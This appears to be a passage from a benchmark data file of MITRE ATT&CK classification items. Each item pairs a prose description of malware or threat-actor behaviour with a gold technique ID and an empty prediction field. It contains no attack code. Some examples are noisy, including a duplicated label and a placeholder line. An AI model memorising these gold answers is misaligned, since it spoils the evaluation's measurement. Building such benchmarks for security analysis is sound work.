InvisiMole has a command to create, set, copy, or delete a specified Registry key or value.\n\t - T1112: Modify Registry\n- Text: KOCTOPUS can delete created registry keys as part of its cleanup procedure.\n\t - T1070: Indicator Removal\n", + "input": "Pillowmint has deleted the filepath \"%APPDATA%\\Intel\\devmonsrv.exe\".", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n- Text: Empire contains modules that can discover and exploit unquoted path vulnerabilities.\n\t - T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path\n- Text: To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable\n\t - T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable\n", + "input": "PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.", + "gold": "- T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.\n\t - T1572: Protocol Tunneling\n- Text: So attackers specify an external C&C server in the command line and the tool connects to this server using HTTP. This remote server is used as a proxy by attackers: the connection that goes to this server is redirected to the internal network by the tool and any response that the tool gets from a computer in the internal network goes to the C&C server. Thus, attackers can communicate with internal servers that are normally unreachable from the internet\n\t - T1090: Proxy\n", + "input": "During CostaRicto, the threat actors used a layer of proxies to manage C2 communications.", + "gold": "- T1090.003: Proxy - Multi-hop Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027: Obfuscated Files or Information\n- Text: Wingbird uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file.\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1569.002: System Services - Service Execution\n- Text: has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.\n\t - T1105: Ingress Tool Transfer\n", + "input": "ISMInjector uses the \"certutil\" command to decode a payload file.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific file extensions on the victims\u2019 disks. The KillDisk malware used in the first wave of December 2016 attacks, instead of encrypting, simply overwrites targeted files\n\t - T1485: Data Destruction\n- Text: SILENTTRINITY can remove files from the compromised host.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Note: the NTRUEncrypt public key cryptosystem encryption algorithm (NTRU), is a lattice-based alternative to Rivest-Shamir-Adleman, known as RSA, and Elliptic-curve cryptography, or ECC, and is based on the shortest vector problem in a lattice\n\t - T1486: Data Encrypted for Impact\n", + "input": "KillDisk deletes system files to make the OS unbootable. KillDisk also targets and deletes files with 35 different file extensions.", + "gold": "- T1485: Data Destruction", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive. Weaponized virtual machine . The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload. The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker\u2019s \u2018builder\u2019 machine. But the cost in terms of size is signficant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack\u2014all just to conceal one 494 KB ransomware executable from detection. The attackers also executed the following commands on the host computer during the Maze attack: This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive. They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies. The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims\n\t - T1047: Windows Management Instrumentation\n- Text: UNC2452 used WMI event subscriptions for persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: has used the command-line interface for execution.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "Operation Wocao has used WMI to execute commands.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bandook has used PowerShell loaders as part of execution.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Wingbird performs multiple process injections to hijack system processes and execute malicious code.\n\t - T1055: Process Injection\n- Text: PowerSploit reflectively loads a Windows PE file into a process.\n\t - T1620: Reflective Code Loading\n", + "input": "menuPass uses PowerSploit to inject shellcode into PowerShell.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Helminth can use DNS for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: Figure 32 shows QUADAGENT issuing DNS requests with incrementing sequence numbers and the C2 providing the session identifier and pre-shared key within the IPv6 answers. The screenshot also shows the Trojan sending a DNS query to notify the C2 that it successfully received the data.\n\t - T1583.002: Acquire Infrastructure - DNS Server\n- Text: No matching sample found for T1590.002\n", + "input": "POWERSOURCE uses DNS TXT records for C2.", + "gold": "- T1071.004: Application Layer Protocol - DNS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: creates a backdoor through which remote attackers can steal system information.\n\t - T1005: Data from Local System\n\t - T1005: Data from Local System\n- Text: searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.\n\t - T1119: Automated Collection\n- Text: Fox Kitten has searched network shares to access sensitive documents.\n\t - T1039: Data from Network Shared Drive\n", + "input": "ThreatNeedle can collect data and files from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Deriving C2 URLs from a Domain Generation Algorithm (DGA) using lists of domain names, subdomains, top-level domains (TLDs), Uniform Resource Identifiers (URIs), file names, and file extensions\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.\n\t - T1568: Dynamic Resolution\n- Text: Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems\n\t - T1102.001: Web Service - Dead Drop Resolver\n", + "input": "Doki has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.", + "gold": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Filename Part-I.doc File Size 11349102 bytes MD5 92942c54224cd462dd201ae11a560bb8 SHA1 85a21624df2211af3daf05c86a3fbea8271059d3 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe\n\t - T1036: Masquerading\n- Text: Kimsuky has lured victims into clicking malicious links.\n\t - T1204.001: User Execution - Malicious Link\n- Text: A gh0st RAT variant has used DLL side-loading.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", + "input": "ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The library used to hide Winnti\u2019s system activity is a copy of the open-source userland rootkit Azazel\u00b9\u2070, with minor changes. When executed, it will register symbols for multiple commonly used functions, including: open(), rmdir(), and unlink(), and modify their returns to hide the malware\u2019s operations\n\t - T1014: Rootkit\n- Text: BlackEnergy has enabled the \"TESTSIGNING\" boot configuration option to facilitate loading of a driver component.\n\t - T1553.006: Subvert Trust Controls - Code Signing Policy Modification\n- Text: Rocke downloaded a file \"libprocesshider\", which could hide files on the target system.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "Carberp has used user mode rootkit techniques to remain hidden on the system.", + "gold": "- T1014: Rootkit", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation\n\t - T1047: Windows Management Instrumentation\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1559.001: Inter-Process Communication - Component Object Model\n\t - T1027: Obfuscated Files or Information\n- Text: has a command to download a file to the system from its C2 server.\n\t - T1105: Ingress Tool Transfer\n- Text: APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n", + "input": "NanHaiShu can download additional files from URLs.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GravityRAT uses the \"netstat\" command to find open ports on the victim\u2019s machine.\n\t - T1049: System Network Connections Discovery\n- Text: PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.\n\t - T1205.001: Traffic Signaling - Port Knocking\n- Text: Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n", + "input": "HEXANE has used netstat to monitor connections to specific ports.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Figure 2: Sofacy Fysbis capability related leakage through strings Figure 2 shows interactive status / feedback strings that can give a defender an initial profile of capabilities\n\t - T1027: Obfuscated Files or Information\n- Text: RDAT can also embed data within a BMP image prior to exfiltration.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n", + "input": "TA551 has used obfuscated variable names in a JavaScript configuration file.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1027: Obfuscated Files or Information\n\t - T1204.002: User Execution - Malicious File\n\t - T1221: Template Injection\n- Text: Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Cardinal RAT lures victims into executing malicious macros embedded within Microsoft Excel documents.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: StreamEx uses rundll32 to call an exported function.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Gelsemium has the ability to store its components in the Registry.\n\t - T1112: Modify Registry\n", + "input": "Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Pteranodon has the ability to use anti-detection functions to identify sandbox environments.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: gathers the computer name and checks the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.\n\t - T1082: System Information Discovery\n", + "input": "Saint Bot has run several virtual machine and sandbox checks, including checking if `Sbiedll.dll` is present in a list of loaded modules, comparing the machine name to `HAL9TH` and the user name to `JohnDoe`, and checking the BIOS version for known virtual machine identifiers.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n\t - T1574: Hijack Execution Flow\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Turian can insert pseudo-random characters into its network encryption setup.\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1574.013: Hijack Execution Flow - KernelCallbackTable\n\t - T1620: Reflective Code Loading\n", + "input": "MiniDuke can use control flow flattening to obscure code.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps. Its decryption routine, part of an executable physical patch, begins somewhere between the start() and WinMain() functions. A fun fact is that the malware authors embedded their malicious code into a binary that was a harmless executable\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence.\n\t - T1197: BITS Jobs\n", + "input": "Bazar has a variant with a packed payload.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BITTER has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.\n\t - T1203: Exploitation for Client Execution\n- Text: Lazarus Group has used mshta.exe to run malicious scripts and download programs.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "Sidewinder has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.", + "gold": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Upon execution, MCMD spawns a console process (cmd.exe) with redirected standard input and output (I/O) handles. Immediately after execution, the window properties of both the MCMD and cmd.exe processes are modified to prevent them from being visible on the active user's desktop. MCMD utilizes the shared I/O handles to send and receive data between the C2 server and the command shell (see Figure 1\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: MacMa can execute supplied shell commands and uses bash scripts to perform additional actions.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: SpeakUp uses Perl scripts.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "Daserf can execute shell commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Valak has the ability to base64 encode and XOR encrypt strings.\n\t - T1027: Obfuscated Files or Information\n- Text: TA505 uses fast flux, a DNS technique used to mask botnets by quickly shifting among compromised hosts, which allows cybercriminals to delay or evade detection. The domains the group has been using to distribute payloads were usually resolved across a lot of IPs\n\t - T1568.001: Dynamic Resolution - Fast Flux DNS\n- Text: WellMess can use junk data in the Base64 string for additional obfuscation.\n\t - T1001.001: Data Obfuscation - Junk Data\n", + "input": "BoxCaon used the \"StackStrings\" obfuscation technique to hide malicious functionalities.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: OilRig has delivered macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system.\n\t - T1204.002: User Execution - Malicious File\n- Text: Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.\n\t - T1203: Exploitation for Client Execution\n", + "input": "APT12 has sent emails with malicious Microsoft Office documents and PDFs attached.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not.\n\t - T1596.003: Search Open Technical Databases - Digital Certificates\n- Text: BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.\n\t - T1036.001: Masquerading - Invalid Code Signature\n", + "input": "BOOSTWRITE has been signed by a valid CA.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NETWIRE has been executed through luring victims into opening malicious documents.\n\t - T1204.002: User Execution - Malicious File\n- Text: The vulnerability tracked as CVE-2022-41352 is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment that plants a web 